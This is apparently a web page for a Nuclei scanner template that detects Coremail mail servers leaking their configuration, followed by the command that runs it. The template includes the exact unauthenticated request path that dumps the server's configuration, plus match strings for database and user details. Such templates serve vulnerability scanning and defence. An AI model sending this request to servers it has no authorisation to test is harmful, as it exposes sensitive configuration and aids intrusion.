Skip to content

Coremail - Config Discovery

ID: coremail-config-disclosure

Severity: high

Author: princechaddha

Tags: config,exposure,coremail

Coremail configuration information was discovered.

id: coremail-config-disclosure
info:
name: Coremail - Config Discovery
author: princechaddha
severity: high
description: Coremail configuration information was discovered.
reference:
- https://www.secpulse.com/archives/107611.html
metadata:
max-request: 1
tags: config,exposure,coremail
http:
- method: GET
path:
- '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'
matchers-condition: and
matchers:
- type: word
words:
- "<object name=\"cm_md_db\">"
- 'containerDefinitions'
- '<string name="User">coremail</string>'
- '<string name="EnableCoremailSmtp">'
condition: or
- type: status
status:
- 200
# digest: 4a0a0047304502206241780b3b8fb4bf50ae9cd85c25089946db96bba4ac8564a18d8683a8c61c38022100dc32c232561e0415d0352d91279bdda6ddffdb262ca6590e4fcb6a1eec69c082:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/exposures/configs/coremail-config-disclosure.yaml"

View on Github